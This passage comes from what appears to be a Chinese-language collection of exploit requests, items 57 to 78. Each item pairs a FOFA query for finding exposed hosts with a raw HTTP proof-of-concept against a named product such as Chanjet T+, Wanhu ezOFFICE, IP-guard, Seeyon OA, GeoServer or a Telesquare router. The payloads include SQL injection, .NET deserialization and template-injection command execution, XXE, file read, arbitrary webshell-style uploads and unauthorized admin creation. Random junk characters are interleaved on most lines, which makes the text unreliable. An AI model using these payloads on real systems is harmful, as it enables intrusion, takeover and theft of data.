3 W" D+ N. u/ T+ E" Q! _Host: x.x.x.x0 s* r) ]: L& n b6 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; v8 g8 h+ ^- T' }+ T6 `$ P
Content-Type: application/json5 {6 T$ O- e) r& F5 ]6 w
0 ?9 `* m$ I' z( b# Y
{! L2 p1 n& L3 U; Z2 ^/ x
"storeID":{5 @ N6 w/ Z* I3 P& u; _
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",$ E8 g7 W0 l* I9 r, ~
"MethodName":"Start",
$ q0 M( ?1 K# }7 { "ObjectInstance":{
2 M: _! p; U# i; r% M "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# e1 [2 A: w* l7 \% z' V) } "StartInfo": {
" T/ l& V# y/ n t. b' f& N6 G "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! z5 |% E5 c q/ K' a- m9 _
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"$ b( [8 T2 C9 x' D9 v
}
. W+ _* v# z( h7 g Q% Q, x# b }
1 S1 ~$ Q/ R0 M$ [0 J }' X+ y" v, d6 N1 R$ Q; R
}$ }# Y! w2 [6 z
" V+ K k2 ^7 Z4 R
/ y, K7 ?' J q) p) h57. 畅捷通T+ keyEdit.aspx SQL注入
# g6 G; ^/ ? C3 j4 O$ SFOFA:app="畅捷通-TPlus"
/ p: G: J6 r1 g' @GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
; g* X+ ^. l- |. M: V; H9 lHost: host
" a8 `# L: f* G% {0 {* |# G4 bUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 H* V/ [6 ]$ T+ zAccept-Charset: utf-8
7 T3 y' T: @1 {- F( X6 q; bAccept-Encoding: gzip, deflate/ \) C* \: p4 I9 R: H
Connection: close
- n7 Y2 Y" d1 o; p& H) X4 s
8 Y+ G* r& O5 K2 D3 ~2 Z3 _$ N1 h7 _/ v0 G3 ?# ?
58. 畅捷通T+ KeyInfoList.aspx sql注入& j2 h. j% d2 O8 z
FOFA:app="畅捷通-TPlus"6 B* D1 v" m0 ]. d
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
% P. j( l2 z0 y# u/ J( MHost: your-ip
" N3 n: P% Z% f* h) d. s6 NUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& A) q- q/ D/ D+ P0 F1 P, U
Accept-Charset: utf-8
8 g. f4 `# }9 T) w+ }& [: kAccept-Encoding: gzip, deflate- ^6 y5 O7 X6 k4 N# @# h
Connection: close
& i1 \2 h, Z" v2 b0 T4 M/ i
! w5 z$ M) P" t$ k& Y( E; L0 [
; |1 I* y# f$ S- z59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
0 R" y' ]- n8 m& V H' f& g; v! zFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
9 e+ T4 k9 g: W/ q/ J" V. Z" iPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1/ ], f7 ?0 T: o6 k7 l
Host: 192.168.86.128:9090
& v& ~* k: b4 i. U8 m. u/ W7 E* z1 {1 S ZUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) v% G& {1 q' b+ ^* C+ E8 f9 U
Connection: close3 V, Y3 l- W0 _( d; ], P
Content-Length: 16691 w. |& C% m# O. h& }3 D
Accept: */*8 v2 e& n+ o: [! A# C1 _1 ^. e
Accept-Language: en7 i, C+ y1 X! i4 u9 T$ x
Content-Type: application/x-www-form-urlencoded" t. U3 d3 A- @6 t: |5 [
Accept-Encoding: gzip
9 d$ q9 s4 z. J5 k1 k1 l. w- {
" ]9 O- d- s/ O- N( |# VPAYLOAD
2 s; Q* k4 m H( c, T4 T
6 U6 m6 w. K$ n" P4 C( e0 |3 f9 l4 G4 B
60. 百卓Smart管理平台 importexport.php SQL注入6 u9 K' X M! {* z2 O" ]
FOFA:title="Smart管理平台"1 u! Z0 @( S. B4 H. ?3 z1 B5 h2 g" y
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
0 _, S* Y( P5 o2 P" Z0 UHost:
( Y6 Y, P. u: x3 |6 W3 T: g) bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: a4 I5 _; {7 s+ G7 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
G& n2 S/ R! g. Z1 u c" VAccept-Encoding: gzip, deflate: [; {5 Z/ I. a1 D: `$ t
Accept-Language: zh-CN,zh;q=0.9
: _( ~) ?7 ]& HConnection: close' {* g8 M8 ]& M# [* t: o
+ r. A: z% C. `- I% T* |) |' B. ], y3 B4 z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
5 @% @9 E' _0 S! ]0 G5 _' p& HFOFA: title="欢迎使用浙大恩特客户资源管理系统"
! V- Q1 y! q: [POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1% F. a/ L- b$ H) Y l0 ~
Host: x.x.x.x
# ~" W8 v! ^, \7 u( n0 E o) kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ K1 s+ _( A& _# MConnection: close
9 E3 \7 q: n5 R2 o- |, CContent-Length: 27
5 |$ T8 X6 b& X* X x! E+ wAccept: */*
# W/ R8 { g# S+ ^Accept-Encoding: gzip, deflate
+ `5 R/ _9 o9 f! l0 t# Y$ |Accept-Language: en6 T5 @$ x K" Z" d9 A
Content-Type: application/x-www-form-urlencoded
8 T( \& G9 a+ S, q, }! s+ L, B6 f4 j& \- v9 o; h; G
8uxssX66eqrqtKObcVa0kid98xa% Z- L# t2 t" ? V% ~& l. n {
2 T! ~; ?( e* Q" ~7 i- D0 p- v
1 K' a! D; a3 o9 {- U
62. IP-guard WebServer 远程命令执行4 J) N! b# A, V' L) d2 _
FOFA:"IP-guard" && icon_hash="2030860561"
/ ?. i/ C# W6 H3 gGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# L: z" j' I) t9 S5 m4 @/ \
Host: x.x.x.x/ w+ Z2 t% w% |9 D% Y) g
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 Y; X }' n/ l9 `Connection: close2 v ?/ {! O4 A' J# @: F
Accept: */*
/ w( L* G0 V+ F# u$ b0 A- KAccept-Language: en
# W+ e1 G/ ^* ~6 J9 B: X7 L+ W9 w4 M. kAccept-Encoding: gzip6 R3 M6 R& Y, h9 R
7 Y3 S! v. X% m g5 ~7 m, f
+ u \0 d F: v; X/ }4 f5 P
访问
2 L* [! ~" D1 @8 R" ]9 a- O p
$ `* x9 J7 L- hGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
. W3 X n: }& aHost: x.x.x.x1 O9 P% h( ]; N) D
- D+ i- F) y" b9 v; j: T
?! @5 v9 M& H% U
63. IP-guard WebServer任意文件读取
6 a, O& ~9 @- bIP-guard < 4.82.0609.0* I6 P. A$ v* Y/ t4 I6 H
FOFA:icon_hash="2030860561"
8 K- o7 L. F, N) ~5 mPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1) X" @" m" J) b
Host: your-ip" k+ S- N) B, c- q( {+ r& l ^: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 O9 \" h. O6 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 ?1 H% O0 ~! v- n- Y8 L! F" C
Accept-Encoding: gzip, deflate
' Y9 [) N4 @" X# |7 C( }Accept-Language: zh-CN,zh;q=0.9: @0 J' ^1 k3 V
Connection: close
/ v0 |# D! R9 c' E( i5 j2 jContent-Type: application/x-www-form-urlencoded
7 c; j% N- _3 U5 ~3 K2 \! L7 L A8 r* K5 R
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
* V9 j9 [. v- G' l0 Z9 K9 \! m: l4 m, P, {3 c& g
64. 捷诚管理信息系统CWSFinanceCommon SQL注入* L9 ]! P5 o- k4 w8 H- c2 e
FOFA:body="/Scripts/EnjoyMsg.js"5 v& {# a# \* z/ v5 t$ b% z* b
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1. x) p1 B; T |0 r6 \
Host: 192.168.86.128:9001
2 {! V, v7 K( oUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
0 g( m+ s5 s0 U9 L' @7 s' ]Connection: close7 F9 n l4 ]' F; I' r7 D) I" C
Content-Length: 369' p. f9 l2 ~6 {9 M `% ^
Accept: */*0 M& s2 A; Y! [
Accept-Language: en; l) h- w, R4 H A* W
Content-Type: text/xml; charset=utf-8: m* V x6 ^! J# [
Accept-Encoding: gzip
2 N9 ?, x$ k5 g# S/ C. B; H A3 l @
<?xml version="1.0" encoding="utf-8"?>
; T* D; P, z' D# D& ]. o<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- i$ D/ H% |, |; O<soap:Body>. e( r. [! v+ R0 h; C% X
<GetOSpById xmlns="http://tempuri.org/">
7 X6 A/ a6 q! V( C1 g4 ?) e <sId>1';waitfor delay '0:0:5'--+</sId>- K. y- F1 v9 {/ D @+ c* ^
</GetOSpById>
) l9 M' q' a& I0 i2 X- i7 t9 a( Q! { </soap:Body>0 A3 w& c& h0 I! N5 y$ }2 n
</soap:Envelope>
+ Q: E4 n* n6 C/ b" N
5 V7 h5 P' M: F2 }- `! e/ B$ B8 G8 f4 ?: w
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ B5 \* J4 e- m. k$ q/ ZFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"7 c. T$ P9 ~) ^+ {
响应200即成功创建账号test123456/123456
* c6 W& V6 x8 ?! L! @' }! S6 ~' kPOST /SystemMng.ashx HTTP/1.1
/ D% g" \) e) P1 X' H" i! q5 zHost:
, Z, f8 s9 n9 G, Q" e& yUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)! i2 K3 N. i& H; M! \
Accept-Encoding: gzip, deflate' ], D1 \9 m ^2 R( Z3 d: F
Accept: */*
9 Y* p1 n) g3 GConnection: close$ t+ T3 l `- E( N6 p% ~, W( r
Accept-Language: en
$ a2 @' ^' E1 ? ?$ b, k: ]Content-Length: 174
( O# y- O! c+ f8 B4 f+ t/ l, } @& I, Q1 l' ~- K, \" F$ A; ^
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
7 B6 ?4 E% F" y* S2 C- A' r) b' g! N( v0 Q: X m- i
. d% B: C+ O3 w0 M$ ]9 ]66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入# g( R8 M9 [% N; l; b
FOFA:app="万户ezOFFICE协同管理平台"! P: Y H2 [; N8 V+ J; n
, Y$ t& \7 ? _$ M+ L* D
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
* N- Y4 F# C* Z- p. H. MHost: x.x.x.x8 n# ]& d" `. T/ M6 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 W: f- }/ A+ Q9 Y9 O
Connection: close6 [1 I" W) u% V1 S1 H; N ?
Accept: */*8 l/ U* ?7 N0 F9 Y) a! c& }! l
Accept-Language: en
, H. P# i0 q% U, _: j$ jAccept-Encoding: gzip+ c/ ?# t# z, y3 m) V( \4 G: _9 o. V
/ b2 ~6 q$ _8 e2 h, l$ k
9 l9 U$ _* Y3 y6 W
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
# _, Q' U/ ], c" r2 p; |" e+ G& ]9 |4 y& i
67. 万户ezOFFICE wpsservlet任意文件上传4 C4 F. f. r3 ?3 r' h1 _2 s
FOFA:app="万户网络-ezOFFICE"
, x; |! I: n1 _6 SnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型! G3 }. z2 J$ t; s9 G
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1! v+ Y( l! k4 q6 p1 ^# g
Host: x.x.x.x
+ ]+ N6 V$ w7 {" |6 @! ~# w1 J& aUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
1 O( L, V Y& u& y4 sContent-Length: 173
- `0 I- y: H8 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 W1 O, G. K+ s$ U
Accept-Encoding: gzip, deflate+ _* a3 e8 m; Y% n
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 @8 ]/ [, l! A# r! k& X& @8 c$ Y
Connection: close
: \) u A6 W- K! S" SContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp# x0 W! Q1 P+ n
DNT: 1; P: z0 a7 I5 Q
Upgrade-Insecure-Requests: 1' N% _3 t( @6 j8 S4 o m* [/ \
: y. i" b- x, }& D0 S--ufuadpxathqvxfqnuyuqaozvseiueerp+ T- B3 G( w4 J: i) A
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
4 g f5 W- A9 A6 i% I+ C5 j! x" p
6 X) o2 ?2 E5 i q<% out.print("sasdfghjkj");%>. u2 L, F" ~9 T1 L7 c9 f6 i/ d
--ufuadpxathqvxfqnuyuqaozvseiueerp--
3 e* |# ?7 d' g' x& s) q' ?* S
5 l. n! J: r$ W. ^
) f9 g4 R V. o* p+ m( u文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
2 J4 l3 }, y7 {2 G. M
4 a1 c0 J! ^4 H, H. k68. 万户ezOFFICE wf_printnum.jsp SQL注入7 A- m" q% f. u- D
FOFA:app="万户ezOFFICE协同管理平台"
3 N9 f. O6 H- z' kGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ h8 m4 t; J& T; K2 I$ m9 \+ K2 C$ _Host: {{host}}
+ l1 S+ x# A. r+ z8 d4 X2 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
; I" F$ a' |, J" N3 ]7 Y7 m1 @Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.84 y/ m1 p( e: {* c5 F# U
Accept-Encoding: gzip, deflate( X8 n3 U$ k- `4 m
Accept-Language: zh-CN,zh;q=0.9
- e6 m. a8 c' c DConnection: close; F* B- p! J7 @& T1 U( Q/ _
8 M8 y- s1 q6 R
@6 {* I/ V$ U1 d
69. 万户 ezOFFICE contract_gd.jsp SQL注入7 w! t4 k- j& j2 u* G3 N
FOFA:app="万户ezOFFICE协同管理平台"
- [5 U% ]0 z9 m8 TGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
. ^# e1 } S% h" j3 d* ^0 G0 uHost: your-ip
# c( G$ j! @* t" H+ PUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: b+ ?" i U O/ S6 U7 [+ |
Accept-Encoding: gzip, deflate
% l; |! ]" a1 Y& fAccept: */*3 [/ ~% V4 m# j ?; ^: }' R
Connection: keep-alive
0 s% ]; e: s: w* Y" z. t' k1 t- _. z7 n5 O1 {! g
% K, _7 m+ Q/ r9 Q: A
70. 万户ezEIP success 命令执行( {- T/ Y; u2 y$ r' }, u7 L- F
FOFA:app="万户网络-ezEIP"
7 D+ K8 [* R/ `2 D+ `) sPOST /member/success.aspx HTTP/1.1' [2 s5 M8 y2 q3 a
Host: {{Hostname}}
% ]+ w% f" V) g, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 _ a' O5 _7 ^. q
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=3 |0 k- ~+ e* ~
Content-Type: application/x-www-form-urlencoded5 L: l" a' z0 }8 y
TYPE: C
( o" g" M, `" B+ U3 J/ SContent-Length: 16702
0 [: ^7 Y. E: u6 n2 b8 F& _, @* T. X% f- V+ j% h
__VIEWSTATE=PAYLOAD6 i6 q9 }7 t( [. B+ B" j/ d
: F* H1 ]: n: l' `0 G# l9 e- P8 E. q# o) { z6 ~
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 y0 s- ?' n5 }0 h$ g" l. K
FOFA:body="PM2项目管理系统BS版增强工具.zip"
1 V0 K! g% F( w# OGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
K& K6 l& A D. f) [0 T1 IHost: x.x.x.xx.x.x.x
- C& ?' |$ c1 {2 CUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 E! i! X. {# q
Connection: close
! Z+ W3 x; T8 b. MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 H* j/ R0 V, U! t! ]: S# `Accept-Encoding: gzip, deflate
& N, r0 x; v7 C' a3 O% ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ }# _& {' S3 Y0 o
Upgrade-Insecure-Requests: 10 v/ \) [& B0 G. D C
$ c# G: ^( _4 j5 k K
+ F9 M+ k( l8 K5 n/ M: t# @72. 致远OA getAjaxDataServlet XXE8 f& ]/ g6 U; K7 D6 M- p$ p, j
FOFA:app="致远互联-OA"
" j g& x3 y( f$ q/ B' z5 y; h( `POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
1 A. w1 b3 H2 `: j/ X/ t7 BHost: 192.168.40.131:8099$ a' X& ?. N' C- f2 p2 s8 p: d
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
8 J! t4 ]8 i, O' ^* \4 c' i6 SConnection: close) z& f- S f7 C& J- {
Content-Length: 583) C2 k8 r; R- u8 R
Content-Type: application/x-www-form-urlencoded
6 ^4 x h0 ~* J0 PAccept-Encoding: gzip
! [2 R* J! ]3 g+ c6 L
; Q4 n& e( C3 ?! u5 `: ?S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
# Z% Z; X* ?9 m* g! v* e$ D8 s* L$ p
. U2 ~3 E) D( N0 h
( V) q" Y2 Q/ r; r73. GeoServer wms远程代码执行& `) V& [; e% `9 h1 M1 a" [
FOFA:icon_hash=”97540678”
1 t" N5 \! U- _0 x3 l8 YPOST /geoserver/wms HTTP/1.1
8 U4 Z7 l4 `8 t- v% q9 k4 D+ eHost:* p4 W! }3 u" b# T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" Z/ B- W/ f; y5 C9 T5 t
Content-Length: 1981
' c$ j8 J3 V8 ~5 IAccept-Encoding: gzip, deflate ^3 F1 F2 _" B2 N
Connection: close
+ W k+ B+ l9 B3 EContent-Type: application/xml2 S5 j$ E: c' ?* ?/ c# S+ [' w& k
SL-CE-SUID: 30 j6 z5 v$ v( z/ H \
$ E' g8 y( [: R. Z7 |; U; jPAYLOAD( \- I8 _! r( k0 ]4 e
& X+ ?) I1 i4 _% u3 M
1 q* C+ y- r! |% H/ ^7 ]+ X0 [74. 致远M3-server 6_1sp1 反序列化RCE
, b) z8 v W7 i" H( eFOFA:title="M3-Server"1 ]7 L* Y/ o! H
PAYLOAD( I8 K' c5 j& e8 W5 J+ b$ Q
; E3 s3 X3 Y2 G" l
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
1 M! ?# G0 C$ l8 t2 Q& N1 HFOFA:app="TELESQUARE-TLR-2005KSH"
! l p2 V/ m4 o k+ @; _& ~GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
4 Q% r) J+ n- \% D- i/ b9 GHost: x.x.x.x
+ ^3 T+ L4 V2 \5 ]; P# M, s+ d, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- E' J5 o4 R$ s! g0 g
Connection: close
+ g5 C) x" f! f. I" ?4 fAccept: */*
. J1 Q! X0 i: O: V0 g) X4 y% WAccept-Language: en& R7 Z0 Q5 c }& h7 k( I
Accept-Encoding: gzip" y4 v% @, e+ ^) p! a4 q* q3 ~# }
^, v+ _" K' _3 W% ?
' q0 `% }" R. p6 g3 _. j" U5 cGET /cgi-bin/test28256.txt HTTP/1.1
/ H9 F8 L0 w, ~( oHost: x.x.x.x! l, Q3 s+ ~9 t1 c
' `0 t+ f5 _; C; Q
2 S) q: a5 [# O4 J& K: I0 D1 u76. 新开普掌上校园服务管理平台service.action远程命令执行: j) @1 A/ O, P1 F4 p5 m
FOFA:title="掌上校园服务管理平台"
, s' e# r2 _" V0 Z) j/ c! S% u; YPOST /service_transport/service.action HTTP/1.1
* g1 N; q* j) R8 EHost: x.x.x.x
6 e' Z. I- G# t4 C* s% QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 p# K8 M, X" \) t7 B( j
Connection: close$ t' y3 @9 h H! T+ b
Content-Length: 211/ x6 K5 p( s0 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% H |: s! n4 V6 ^4 Q; K* lAccept-Encoding: gzip, deflate
' s) n3 ?- {3 B7 n6 H) VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 ?- a7 s( y. ` }& rCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
' V* H* K$ ~' aUpgrade-Insecure-Requests: 1
, k& @1 x7 X; y
4 \6 C2 o: I+ ]: q, \" b{& U+ E2 h- E) f
"command": "GetFZinfo",# i9 H: y8 m$ d) j8 H' i1 o' D
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
! o5 e$ c3 Y4 P+ r ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 G; U1 K' K5 L3 X( V
}
5 g( c1 n( N6 K1 Z9 k5 s/ V+ R; a( F# \3 S4 {, c$ w' T" ?# C5 a
, E3 n3 V* I' A- k( XGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.14 V7 W6 y0 ]2 P3 o$ b7 O
Host: x.x.x.x
+ Q4 i; t% P& J2 Y5 j( M5 q1 N
$ I& E5 F2 C7 _6 f4 A& w6 ~. H( W8 }; E0 `% J
) V4 t( M+ P5 H5 F9 P5 p77. F22服装管理软件系统UploadHandler.ashx任意文件上传) q! k4 T4 ]' y! X0 q- H
FOFA:body="F22WEB登陆"( p! s* {3 S4 y7 d, S5 u& D
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
# Z m& W! O3 h; N7 ^# p; rHost: x.x.x.x
+ J: I& S2 H; z8 \$ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! w) X$ F4 L3 z( @3 i$ X1 l0 L$ SConnection: close- {! }. r: I/ c
Content-Length: 433( ]8 x& |% g3 Y2 p6 b/ ~) W9 i
Accept: */*; }% A# J( _& |+ V. z! T
Accept-Encoding: gzip, deflate; T( i* O0 Q4 Z5 J7 }" j! {
Accept-Language: zh-CN,zh;q=0.91 w0 p* Z3 A$ l7 W1 }
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
, V/ H$ |2 b% |! b) i, \" ?3 R/ z2 _
* T5 P5 ]+ U, \" G# k------------398jnjVTTlDVXHlE7yYnfwBoix
: R- y2 W* r! t9 n2 zContent-Disposition: form-data; name="folder", I, T8 i" H; [8 I- I
5 ^* \( }3 q" n
/upload/udplog$ r+ n# q$ e1 N* ?0 {$ }
------------398jnjVTTlDVXHlE7yYnfwBoix$ O4 \8 f# E1 ?7 K# a8 M
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
; m( y9 s+ H# e. J" ZContent-Type: application/octet-stream
$ z( d. J* K* |- l! T
; n: p4 R' {. J' m7 L! A# o8 Nhello1234567- C. E+ H' v; B7 ?% [3 @
------------398jnjVTTlDVXHlE7yYnfwBoix/ c2 V7 ?" B, ^/ M& O2 Z4 U! Q: X
Content-Disposition: form-data; name="Upload"
5 e3 Q7 O# I0 V9 D
. c& g$ B5 y# p% V" nSubmit Query8 g5 U$ S8 m Y% Y) \/ l, l
------------398jnjVTTlDVXHlE7yYnfwBoix--, L! Y7 |. J9 Y$ e9 }
) i* c0 R' H1 F. m& `: A; W
6 p! M2 Z( T2 p' X) l% z78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- |; L) A0 q7 l" r
FOFA:icon_hash="2001627082"# o( v' _/ _" t$ @
POST /Platform/System/FileUpload.ashx HTTP/1.1
, d: p! K) I$ m1 GHost: x.x.x.x6 g# G P+ Q$ g- ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 T% G/ I$ N# S+ RConnection: close0 X( J" Y2 |6 b$ p0 `* J! }- h
Content-Length: 336
+ o' ~* x! G# w$ NAccept-Encoding: gzip% C. [# \ w9 a( x; I! o- u% f6 C
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l# q( w9 h# M5 \, `
( H* h' U0 }8 q# V- d# g5 y------YsOxWxSvj1KyZow1PTsh98fdu6l
9 N1 I( t0 g# D5 U K8 N- xContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"; P. S& F5 g! ` j7 a
Content-Type: image/png
6 b/ k7 q1 ?3 X
8 \) W; z$ s9 M9 f+ m- XYsOxWxSvj1KyZow1PTsh98fdu6l7 u+ @# h. s8 f
------YsOxWxSvj1KyZow1PTsh98fdu6l
